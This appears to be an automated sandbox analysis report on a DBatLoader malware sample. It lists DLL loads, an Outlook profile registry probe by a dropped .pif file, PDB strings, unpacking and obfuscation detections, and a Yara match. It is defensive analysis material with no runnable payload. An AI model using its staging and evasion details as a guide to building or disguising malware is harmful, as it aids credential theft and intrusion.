Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: z1Transaction_ID_REF2418_cmd.bat

Static file information: File size 1139107 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.0000000003004000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003000000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021720000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021751000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack

Yara detected DBatLoader

Source: Yara match

File source: 3.2.x.exe.31c0000.0.unpack, type: UNPACKEDPE

.NET source code contains method to dynamically call methods (often used by packers)

Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Binary contains a suspicious time stamp

Source: xrbjyllC.pif.3.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031D894C LoadLibraryW,GetProcAddress,FreeLibrary,

3_2_031D894C

PE file contains sections with non-standard names

Source: alpha.pif.6.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C332C push eax; ret	3_2_031C3368
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031CC349 push 8B031CC1h; ret	3_2_031CC34E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031EC378 push 031EC56Eh; ret	3_2_031EC566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C63B0 push 031C640Bh; ret	3_2_031C6403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C63AE push 031C640Bh; ret	3_2_031C6403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031ED2FC push 031ED367h; ret	3_2_031ED35F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DF108 push ecx; mov dword ptr [esp], edx	3_2_031DF10D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031ED144 push 031ED1ECh; ret	3_2_031ED1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031ED1F8 push 031ED288h; ret	3_2_031ED280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D306C push 031D30B9h; ret	3_2_031D30B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D306B push 031D30B9h; ret	3_2_031D30B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031ED0AC push 031ED125h; ret	3_2_031ED11D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C6784 push 031C67C6h; ret	3_2_031C67BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C6782 push 031C67C6h; ret	3_2_031C67BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031EC570 push 031EC56Eh; ret	3_2_031EC566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031CC56C push ecx; mov dword ptr [esp], edx	3_2_031CC571
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031CD5A0 push 031CD5CCh; ret	3_2_031CD5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031CCBEC push 031CCD72h; ret	3_2_031CCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031CCA1E push 031CCD72h; ret	3_2_031CCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03234A50 push eax; ret	3_2_03234B20
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DAADF push 031DAB18h; ret	3_2_031DAB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D8AD8 push 031D8B10h; ret	3_2_031D8B08
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DAAE0 push 031DAB18h; ret	3_2_031DAB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D790C push 031D7989h; ret	3_2_031D7981
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D6948 push 031D69F3h; ret	3_2_031D69EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D6946 push 031D69F3h; ret	3_2_031D69EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D886C push 031D88AEh; ret	3_2_031D88A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D2F60 push 031D2FD6h; ret	3_2_031D2FCE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D5E7C push ecx; mov dword ptr [esp], edx	3_2_031D5E7E
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_0041C40C push cs; iretd	9_2_0041C4E2
